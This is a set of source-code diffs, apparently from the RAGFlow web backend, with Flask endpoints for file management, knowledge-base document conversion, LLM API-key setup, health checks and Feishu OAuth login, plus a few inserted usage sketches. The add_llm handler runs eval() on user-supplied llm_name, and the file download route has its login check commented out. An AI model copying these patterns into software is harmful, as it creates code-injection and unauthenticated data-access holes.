                        return get_data_error_result(
                            retmsg="Database error (Document removal)!")
                File2DocumentService.delete_by_file_id(id)

                # insert
                for kb_id in kb_ids:
                    e, kb = KnowledgebaseService.get_by_id(kb_id)
                    if not e:
                        return get_data_error_result(
                            retmsg="Can't find this knowledgebase!")
                    e, file = FileService.get_by_id(id)
                    if not e:
                        return get_data_error_result(
                            retmsg="Can't find this file!")

                    doc = DocumentService.insert({
                        "id": get_uuid(),
                        "kb_id": kb.id,
                        "parser_id": kb.parser_id,
                        "parser_config": kb.parser_config,
                        "created_by": current_user.id,
                        "type": file.type,
                        "name": file.name,
                        "location": file.location,
                        "size": file.size
                    })
                    file2document = File2DocumentService.insert({
                        "id": get_uuid(),
                        "file_id": id,
                        "document_id": doc.id,
                    })
                    file2documents.append(file2document.to_json())
        return get_json_result(data=file2documents)
    except Exception as e:
        return server_error_response(e)

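A sketch of the /convert call (URL and auth header assumed): folders are expanded to their innermost files, stale documents are removed first, then one document per (file, knowledge base) pair is created and mapped via File2Document:

import requests

r = requests.post("http://localhost:9380/v1/file2document/convert",  # URL assumed
                  json={"file_ids": ["<file_id_or_folder_id>"],
                        "kb_ids": ["<kb_id>"]},
                  headers={"Authorization": "<token>"})
print(r.json())  # list of the created file2document mappings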
@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("file_ids")
def rm():
    req = request.json
    file_ids = req["file_ids"]
    if not file_ids:
        return get_json_result(
            data=False, retmsg='Lack of "Files ID"', retcode=RetCode.ARGUMENT_ERROR)
    try:
        for file_id in file_ids:
            informs = File2DocumentService.get_by_file_id(file_id)
            if not informs:
                return get_data_error_result(retmsg="Inform not found!")
            for inform in informs:
                if not inform:
                    return get_data_error_result(retmsg="Inform not found!")
                File2DocumentService.delete_by_file_id(file_id)
                doc_id = inform.document_id
                e, doc = DocumentService.get_by_id(doc_id)
                if not e:
                    return get_data_error_result(retmsg="Document not found!")
                tenant_id = DocumentService.get_tenant_id(doc_id)
                if not tenant_id:
                    return get_data_error_result(retmsg="Tenant not found!")
                if not DocumentService.remove_document(doc, tenant_id):
                    return get_data_error_result(
                        retmsg="Database error (Document removal)!")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
api/apps/file_app.py (new file, 370 lines)
@@ -0,0 +1,370 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
import os
import pathlib
import re

import flask
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.db import FileType, FileSource
from api.db.services import duplicate_name
from api.db.services.file_service import FileService
from api.settings import RetCode
from api.utils.api_utils import get_json_result
from api.utils.file_utils import filename_type
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO


@manager.route('/upload', methods=['POST'])
@login_required
# @validate_request("parent_id")
def upload():
    pf_id = request.form.get("parent_id")

    if not pf_id:
        root_folder = FileService.get_root_folder(current_user.id)
        pf_id = root_folder["id"]

    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
    file_objs = request.files.getlist('file')

    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
    file_res = []
    try:
        for file_obj in file_objs:
            e, file = FileService.get_by_id(pf_id)
            if not e:
                return get_data_error_result(
                    retmsg="Can't find this folder!")
            MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
            if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(current_user.id) >= MAX_FILE_NUM_PER_USER:
                return get_data_error_result(
                    retmsg="Exceed the maximum file number of a free user!")

            # split file name path
            if not file_obj.filename:
                e, file = FileService.get_by_id(pf_id)
                file_obj_names = [file.name, file_obj.filename]
            else:
                full_path = '/' + file_obj.filename
                file_obj_names = full_path.split('/')
            file_len = len(file_obj_names)

            # get folder
            file_id_list = FileService.get_id_list_by_id(pf_id, file_obj_names, 1, [pf_id])
            len_id_list = len(file_id_list)

            # create folder
            if file_len != len_id_list:
                e, file = FileService.get_by_id(file_id_list[len_id_list - 1])
                if not e:
                    return get_data_error_result(retmsg="Folder not found!")
                last_folder = FileService.create_folder(file, file_id_list[len_id_list - 1], file_obj_names,
                                                        len_id_list)
            else:
                e, file = FileService.get_by_id(file_id_list[len_id_list - 2])
                if not e:
                    return get_data_error_result(retmsg="Folder not found!")
                last_folder = FileService.create_folder(file, file_id_list[len_id_list - 2], file_obj_names,
                                                        len_id_list)

            # file type
            filetype = filename_type(file_obj_names[file_len - 1])
            location = file_obj_names[file_len - 1]
            while MINIO.obj_exist(last_folder.id, location):
                location += "_"
            blob = file_obj.read()
            filename = duplicate_name(
                FileService.query,
                name=file_obj_names[file_len - 1],
                parent_id=last_folder.id)
            file = {
                "id": get_uuid(),
                "parent_id": last_folder.id,
                "tenant_id": current_user.id,
                "created_by": current_user.id,
                "type": filetype,
                "name": filename,
                "location": location,
                "size": len(blob),
            }
            file = FileService.insert(file)
            MINIO.put(last_folder.id, location, blob)
            file_res.append(file.to_json())
        return get_json_result(data=file_res)
    except Exception as e:
        return server_error_response(e)
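Because this handler splits the filename on '/', a client can mirror a directory tree by sending relative paths; a sketch (URL and auth header assumed):

import requests

# The relative path "docs/notes.txt" makes the handler create the missing
# "docs" folder under parent_id before storing the blob.
files = [("file", ("docs/notes.txt", open("notes.txt", "rb")))]
r = requests.post("http://localhost:9380/v1/file/upload",  # URL assumed
                  data={"parent_id": "<folder_id>"},  # omit to use the root folder
                  files=files,
                  headers={"Authorization": "<token>"})
print(r.json())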


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("name")
def create():
    req = request.json
    pf_id = request.json.get("parent_id")
    input_file_type = request.json.get("type")
    if not pf_id:
        root_folder = FileService.get_root_folder(current_user.id)
        pf_id = root_folder["id"]

    try:
        if not FileService.is_parent_folder_exist(pf_id):
            return get_json_result(
                data=False, retmsg="Parent Folder Doesn't Exist!", retcode=RetCode.OPERATING_ERROR)
        if FileService.query(name=req["name"], parent_id=pf_id):
            return get_data_error_result(
                retmsg="Duplicated folder name in the same folder.")

        if input_file_type == FileType.FOLDER.value:
            file_type = FileType.FOLDER.value
        else:
            file_type = FileType.VIRTUAL.value

        file = FileService.insert({
            "id": get_uuid(),
            "parent_id": pf_id,
            "tenant_id": current_user.id,
            "created_by": current_user.id,
            "name": req["name"],
            "location": "",
            "size": 0,
            "type": file_type
        })

        return get_json_result(data=file.to_json())
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_files():
    pf_id = request.args.get("parent_id")

    keywords = request.args.get("keywords", "")

    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 15))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    if not pf_id:
        root_folder = FileService.get_root_folder(current_user.id)
        pf_id = root_folder["id"]
        FileService.init_knowledgebase_docs(pf_id, current_user.id)
    try:
        e, file = FileService.get_by_id(pf_id)
        if not e:
            return get_data_error_result(retmsg="Folder not found!")

        files, total = FileService.get_by_pf_id(
            current_user.id, pf_id, page_number, items_per_page, orderby, desc, keywords)

        parent_folder = FileService.get_parent_folder(pf_id)
        if not FileService.get_parent_folder(pf_id):
            return get_json_result(retmsg="File not found!")

        return get_json_result(data={"total": total, "files": files, "parent_folder": parent_folder.to_json()})
    except Exception as e:
        return server_error_response(e)


@manager.route('/root_folder', methods=['GET'])
@login_required
def get_root_folder():
    try:
        root_folder = FileService.get_root_folder(current_user.id)
        return get_json_result(data={"root_folder": root_folder})
    except Exception as e:
        return server_error_response(e)


@manager.route('/parent_folder', methods=['GET'])
@login_required
def get_parent_folder():
    file_id = request.args.get("file_id")
    try:
        e, file = FileService.get_by_id(file_id)
        if not e:
            return get_data_error_result(retmsg="Folder not found!")

        parent_folder = FileService.get_parent_folder(file_id)
        return get_json_result(data={"parent_folder": parent_folder.to_json()})
    except Exception as e:
        return server_error_response(e)


@manager.route('/all_parent_folder', methods=['GET'])
@login_required
def get_all_parent_folders():
    file_id = request.args.get("file_id")
    try:
        e, file = FileService.get_by_id(file_id)
        if not e:
            return get_data_error_result(retmsg="Folder not found!")

        parent_folders = FileService.get_all_parent_folders(file_id)
        parent_folders_res = []
        for parent_folder in parent_folders:
            parent_folders_res.append(parent_folder.to_json())
        return get_json_result(data={"parent_folders": parent_folders_res})
    except Exception as e:
        return server_error_response(e)

@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("file_ids")
def rm():
    req = request.json
    file_ids = req["file_ids"]
    try:
        for file_id in file_ids:
            e, file = FileService.get_by_id(file_id)
            if not e:
                return get_data_error_result(retmsg="File or Folder not found!")
            if not file.tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            if file.source_type == FileSource.KNOWLEDGEBASE:
                continue

            if file.type == FileType.FOLDER.value:
                file_id_list = FileService.get_all_innermost_file_ids(file_id, [])
                for inner_file_id in file_id_list:
                    e, file = FileService.get_by_id(inner_file_id)
                    if not e:
                        return get_data_error_result(retmsg="File not found!")
                    MINIO.rm(file.parent_id, file.location)
                FileService.delete_folder_by_pf_id(current_user.id, file_id)
            else:
                if not FileService.delete(file):
                    return get_data_error_result(
                        retmsg="Database error (File removal)!")

            # delete file2document
            informs = File2DocumentService.get_by_file_id(file_id)
            for inform in informs:
                doc_id = inform.document_id
                e, doc = DocumentService.get_by_id(doc_id)
                if not e:
                    return get_data_error_result(retmsg="Document not found!")
                tenant_id = DocumentService.get_tenant_id(doc_id)
                if not tenant_id:
                    return get_data_error_result(retmsg="Tenant not found!")
                if not DocumentService.remove_document(doc, tenant_id):
                    return get_data_error_result(
                        retmsg="Database error (Document removal)!")
            File2DocumentService.delete_by_file_id(file_id)

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rename', methods=['POST'])
@login_required
@validate_request("file_id", "name")
def rename():
    req = request.json
    try:
        e, file = FileService.get_by_id(req["file_id"])
        if not e:
            return get_data_error_result(retmsg="File not found!")
        if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                file.name.lower()).suffix:
            return get_json_result(
                data=False,
                retmsg="The extension of file can't be changed",
                retcode=RetCode.ARGUMENT_ERROR)
        for file in FileService.query(name=req["name"], pf_id=file.parent_id):
            if file.name == req["name"]:
                return get_data_error_result(
                    retmsg="Duplicated file name in the same folder.")

        if not FileService.update_by_id(
                req["file_id"], {"name": req["name"]}):
            return get_data_error_result(
                retmsg="Database error (File rename)!")

        informs = File2DocumentService.get_by_file_id(req["file_id"])
        if informs:
            if not DocumentService.update_by_id(
                    informs[0].document_id, {"name": req["name"]}):
                return get_data_error_result(
                    retmsg="Database error (Document rename)!")

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get/<file_id>', methods=['GET'])
# @login_required
def get(file_id):
    try:
        e, file = FileService.get_by_id(file_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        b, n = File2DocumentService.get_minio_address(file_id=file_id)
        response = flask.make_response(MINIO.get(b, n))
        ext = re.search(r"\.([^.]+)$", file.name)
        if ext:
            if file.type == FileType.VISUAL.value:
                response.headers.set('Content-Type', 'image/%s' % ext.group(1))
            else:
                response.headers.set(
                    'Content-Type',
                    'application/%s' %
                    ext.group(1))
        return response
    except Exception as e:
        return server_error_response(e)


@manager.route('/mv', methods=['POST'])
@login_required
@validate_request("src_file_ids", "dest_file_id")
def move():
    req = request.json
    try:
        file_ids = req["src_file_ids"]
        parent_id = req["dest_file_id"]
        for file_id in file_ids:
            e, file = FileService.get_by_id(file_id)
            if not e:
                return get_data_error_result(retmsg="File or Folder not found!")
            if not file.tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
        fe, _ = FileService.get_by_id(parent_id)
        if not fe:
            return get_data_error_result(retmsg="Parent Folder not found!")
        FileService.move_file(file_ids, parent_id)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
@@ -19,16 +19,18 @@ from flask_login import login_required, current_user

from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService, UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid, get_format_time
from api.db import StatusEnum, UserTenantRole
from api.db import StatusEnum, UserTenantRole, FileSource
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.db_models import Knowledgebase
from api.db.db_models import Knowledgebase, File
from api.settings import stat_logger, RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
from rag.utils import ELASTICSEARCH
from rag.utils.es_conn import ELASTICSEARCH


@manager.route('/create', methods=['post'])
@@ -109,9 +111,9 @@ def detail():

@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_kbs():
    page_number = request.args.get("page", 1)
    items_per_page = request.args.get("page_size", 15)
    items_per_page = request.args.get("page_size", 150)
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
@@ -136,17 +138,14 @@ def rm():
            data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)

        for doc in DocumentService.query(kb_id=req["kb_id"]):
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=doc.id), idxnm=search.index_name(kbs[0].tenant_id))

            DocumentService.increment_chunk_num(
                doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
            if not DocumentService.delete(doc):
            if not DocumentService.remove_document(doc, kbs[0].tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")
            f2d = File2DocumentService.get_by_document_id(doc.id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc.id)

        if not KnowledgebaseService.update_by_id(
                req["kb_id"], {"status": StatusEnum.INVALID.value}):
        if not KnowledgebaseService.delete_by_id(req["kb_id"]):
            return get_data_error_result(
                retmsg="Database error (Knowledgebase removal)!")
        return get_json_result(data=True)

|
||||
from api.db import StatusEnum, LLMType
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.llm import EmbeddingModel, ChatModel
|
||||
from rag.llm import EmbeddingModel, ChatModel, RerankModel
|
||||
|
||||
|
||||
@manager.route('/factories', methods=['GET'])
|
||||
@ -28,7 +28,7 @@ from rag.llm import EmbeddingModel, ChatModel
|
||||
def factories():
|
||||
try:
|
||||
fac = LLMFactoriesService.get_all()
|
||||
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["QAnything", "FastEmbed"]])
|
||||
return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -39,17 +39,18 @@ def factories():
|
||||
def set_api_key():
|
||||
req = request.json
|
||||
# test if api key works
|
||||
chat_passed = False
|
||||
chat_passed, embd_passed, rerank_passed = False, False, False
|
||||
factory = req["llm_factory"]
|
||||
msg = ""
|
||||
for llm in LLMService.query(fid=factory):
|
||||
if llm.model_type == LLMType.EMBEDDING.value:
|
||||
if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
|
||||
mdl = EmbeddingModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.encode(["Test if the api key is available"])
|
||||
if len(arr[0]) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
embd_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
|
||||
elif not chat_passed and llm.model_type == LLMType.CHAT.value:
|
||||
@ -60,10 +61,21 @@ def set_api_key():
|
||||
"temperature": 0.9})
|
||||
if not tc:
|
||||
raise Exception(m)
|
||||
chat_passed = True
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
chat_passed = True
|
||||
elif not rerank_passed and llm.model_type == LLMType.RERANK:
|
||||
mdl = RerankModel[factory](
|
||||
req["api_key"], llm.llm_name, base_url=req.get("base_url"))
|
||||
try:
|
||||
arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
|
||||
if len(arr) == 0 or tc == 0:
|
||||
raise Exception("Fail")
|
||||
except Exception as e:
|
||||
msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(
|
||||
e)
|
||||
rerank_passed = True
|
||||
|
||||
if msg:
|
||||
return get_data_error_result(retmsg=msg)
|
||||
@@ -96,20 +108,43 @@ def set_api_key():
@validate_request("llm_factory", "llm_name", "model_type")
def add_llm():
    req = request.json
    factory = req["llm_factory"]

    if factory == "VolcEngine":
        # For VolcEngine, due to its special authentication method
        # Assemble volc_ak, volc_sk, endpoint_id into api_key
        temp = list(eval(req["llm_name"]).items())[0]
        llm_name = temp[0]
        endpoint_id = temp[1]
        api_key = '{' + f'"volc_ak": "{req.get("volc_ak", "")}", ' \
                        f'"volc_sk": "{req.get("volc_sk", "")}", ' \
                        f'"ep_id": "{endpoint_id}", ' + '}'
    elif factory == "Bedrock":
        # For Bedrock, due to its special authentication method
        # Assemble bedrock_ak, bedrock_sk, bedrock_region
        llm_name = req["llm_name"]
        api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
                        f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
                        f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
    else:
        llm_name = req["llm_name"]
        api_key = "xxxxxxxxxxxxxxx"

    llm = {
        "tenant_id": current_user.id,
        "llm_factory": req["llm_factory"],
        "llm_factory": factory,
        "model_type": req["model_type"],
        "llm_name": req["llm_name"],
        "llm_name": llm_name,
        "api_base": req.get("api_base", ""),
        "api_key": "xxxxxxxxxxxxxxx"
        "api_key": api_key
    }

    factory = req["llm_factory"]
    msg = ""
    if llm["model_type"] == LLMType.EMBEDDING.value:
        mdl = EmbeddingModel[factory](
            key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
            key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
            model_name=llm["llm_name"],
            base_url=llm["api_base"])
        try:
            arr, tc = mdl.encode(["Test if the api key is available"])
            if len(arr[0]) == 0 or tc == 0:
@@ -118,7 +153,10 @@ def add_llm():
            msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.CHAT.value:
        mdl = ChatModel[factory](
            key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
            key=llm['api_key'] if factory in ["VolcEngine", "Bedrock"] else None,
            model_name=llm["llm_name"],
            base_url=llm["api_base"]
        )
        try:
            m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
                "temperature": 0.9})
@@ -134,7 +172,6 @@ def add_llm():
    if msg:
        return get_data_error_result(retmsg=msg)


    if not TenantLLMService.filter_update(
            [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
        TenantLLMService.save(**llm)
@@ -142,6 +179,16 @@ def add_llm():
    return get_json_result(data=True)

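To make the assembly above concrete, this is what the stored api_key string looks like for Bedrock with sample inputs (values illustrative; note the trailing ", " the f-string concatenation leaves before the closing brace):

# Illustration only; mirrors the Bedrock branch of add_llm() above.
req = {"bedrock_ak": "AKIA...", "bedrock_sk": "<secret>", "bedrock_region": "us-east-1"}
api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
                f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
                f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
print(api_key)
# {"bedrock_ak": "AKIA...", "bedrock_sk": "<secret>", "bedrock_region": "us-east-1", }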
@manager.route('/delete_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name")
def delete_llm():
    req = request.json
    TenantLLMService.filter_delete(
        [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
    return get_json_result(data=True)


@manager.route('/my_llms', methods=['GET'])
@login_required
def my_llms():
@@ -165,7 +212,7 @@ def my_llms():

@manager.route('/list', methods=['GET'])
@login_required
def list():
def list_app():
    model_type = request.args.get("model_type")
    try:
        objs = TenantLLMService.query(tenant_id=current_user.id)
@@ -174,7 +221,7 @@ def list():
        llms = [m.to_dict()
                for m in llms if m.status == StatusEnum.VALID.value]
        for m in llms:
            m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["QAnything","FastEmbed"]
            m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao","FastEmbed", "BAAI"]

        llm_set = set([m["llm_name"] for m in llms])
        for o in objs:
@@ -184,7 +231,7 @@ def list():

        res = {}
        for m in llms:
            if model_type and m["model_type"] != model_type:
            if model_type and m["model_type"].find(model_type)<0:
                continue
            if m["fid"] not in res:
                res[m["fid"]] = []

api/apps/system_app.py (new file, 68 lines)
@@ -0,0 +1,68 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
from flask_login import login_required

from api.db.services.knowledgebase_service import KnowledgebaseService
from api.utils.api_utils import get_json_result
from api.versions import get_rag_version
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from timeit import default_timer as timer

from rag.utils.redis_conn import REDIS_CONN


@manager.route('/version', methods=['GET'])
@login_required
def version():
    return get_json_result(data=get_rag_version())


@manager.route('/status', methods=['GET'])
@login_required
def status():
    res = {}
    st = timer()
    try:
        res["es"] = ELASTICSEARCH.health()
        res["es"]["elapsed"] = "{:.1f}".format((timer() - st)*1000.)
    except Exception as e:
        res["es"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}

    st = timer()
    try:
        MINIO.health()
        res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
    except Exception as e:
        res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}

    st = timer()
    try:
        KnowledgebaseService.get_by_id("x")
        res["mysql"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
    except Exception as e:
        res["mysql"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}

    st = timer()
    try:
        qinfo = REDIS_CONN.health(SVR_QUEUE_NAME)
        res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.),
                        "pending": qinfo.get("pending", 0)}
    except Exception as e:
        res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}

    return get_json_result(data=res)
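Each subsystem is probed and timed independently, so one failing dependency only downgrades its own entry; a sketch of reading the endpoint (URL and auth header assumed, response values illustrative):

import requests

r = requests.get("http://localhost:9380/v1/system/status",  # URL assumed
                 headers={"Authorization": "<token>"})
print(r.json())
# e.g. {"data": {"es":    {"status": "green", "elapsed": "3.2", ...},
#                "minio": {"status": "green", "elapsed": "1.1"},
#                "mysql": {"status": "green", "elapsed": "0.8"},
#                "redis": {"status": "green", "elapsed": "0.5", "pending": 0}}}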
@@ -13,7 +13,9 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import re
from datetime import datetime

from flask import request, session, redirect
from werkzeug.security import generate_password_hash, check_password_hash
@@ -22,11 +24,13 @@ from flask_login import login_required, current_user, login_user, logout_user
from api.db.db_models import TenantLLM
from api.db.services.llm_service import TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, validate_request
from api.utils import get_uuid, get_format_time, decrypt, download_img
from api.db import UserTenantRole, LLMType
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
    LLM_FACTORY, LLM_BASE_URL
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
from api.db import UserTenantRole, LLMType, FileType
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
    API_KEY, \
    LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
from api.db.services.user_service import UserService, TenantService, UserTenantService
from api.db.services.file_service import FileService
from api.settings import stat_logger
from api.utils.api_utils import get_json_result, cors_reponse

@@ -56,6 +60,8 @@ def login():
        response_data = user.to_json()
        user.access_token = get_uuid()
        login_user(user)
        user.update_time = current_timestamp(),
        user.update_date = datetime_format(datetime.now()),
        user.save()
        msg = "Welcome back!"
        return cors_reponse(data=response_data, auth=user.get_id(), retmsg=msg)
@@ -118,6 +124,79 @@ def github_callback():
    return redirect("/?auth=%s" % user.get_id())


@manager.route('/feishu_callback', methods=['GET'])
def feishu_callback():
    import requests
    app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
        "app_id": FEISHU_OAUTH.get("app_id"),
        "app_secret": FEISHU_OAUTH.get("app_secret")
    }), headers={"Content-Type": "application/json; charset=utf-8"})
    app_access_token_res = app_access_token_res.json()
    if app_access_token_res['code'] != 0:
        return redirect("/?error=%s" % app_access_token_res)

    res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
        "grant_type": FEISHU_OAUTH.get("grant_type"),
        "code": request.args.get('code')
    }), headers={"Content-Type": "application/json; charset=utf-8",
                 'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
    res = res.json()
    if res['code'] != 0:
        return redirect("/?error=%s" % res["message"])

    if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
        return redirect("/?error=contact:user.email:readonly not in scope")
    session["access_token"] = res["data"]["access_token"]
    session["access_token_from"] = "feishu"
    userinfo = user_info_from_feishu(session["access_token"])
    users = UserService.query(email=userinfo["email"])
    user_id = get_uuid()
    if not users:
        try:
            try:
                avatar = download_img(userinfo["avatar_url"])
            except Exception as e:
                stat_logger.exception(e)
                avatar = ""
            users = user_register(user_id, {
                "access_token": session["access_token"],
                "email": userinfo["email"],
                "avatar": avatar,
                "nickname": userinfo["en_name"],
                "login_channel": "feishu",
                "last_login_time": get_format_time(),
                "is_superuser": False,
            })
            if not users:
                raise Exception('Register user failure.')
            if len(users) > 1:
                raise Exception('Same E-mail exist!')
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            stat_logger.exception(e)
            return redirect("/?error=%s" % str(e))
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())
def user_info_from_feishu(access_token):
    import requests
    headers = {"Content-Type": "application/json; charset=utf-8",
               'Authorization': f"Bearer {access_token}"}
    res = requests.get(
        f"https://open.feishu.cn/open-apis/authen/v1/user_info",
        headers=headers)
    user_info = res.json()["data"]
    user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
    return user_info


def user_info_from_github(access_token):
    import requests
    headers = {"Accept": "application/json",
@@ -196,7 +275,7 @@ def rollback_user_registration(user_id):
    except Exception as e:
        pass
    try:
        TenantLLM.delete().where(TenantLLM.tenant_id == user_id).excute()
        TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
    except Exception as e:
        pass

@@ -210,7 +289,8 @@ def user_register(user_id, user):
        "embd_id": EMBEDDING_MDL,
        "asr_id": ASR_MDL,
        "parser_ids": PARSERS,
        "img2txt_id": IMAGE2TEXT_MDL
        "img2txt_id": IMAGE2TEXT_MDL,
        "rerank_id": RERANK_MDL
    }
    usr_tenant = {
        "tenant_id": user_id,
@@ -218,6 +298,17 @@ def user_register(user_id, user):
        "invited_by": user_id,
        "role": UserTenantRole.OWNER
    }
    file_id = get_uuid()
    file = {
        "id": file_id,
        "parent_id": file_id,
        "tenant_id": user_id,
        "created_by": user_id,
        "name": "/",
        "type": FileType.FOLDER.value,
        "size": 0,
        "location": "",
    }
    tenant_llm = []
    for llm in LLMService.query(fid=LLM_FACTORY):
        tenant_llm.append({"tenant_id": user_id,
@@ -233,6 +324,7 @@ def user_register(user_id, user):
    TenantService.insert(**tenant)
    UserTenantService.insert(**usr_tenant)
    TenantLLMService.insert_many(tenant_llm)
    FileService.insert(file)
    return UserService.query(email=user["email"])


api/contants.py (new file, 16 lines)
@@ -0,0 +1,16 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
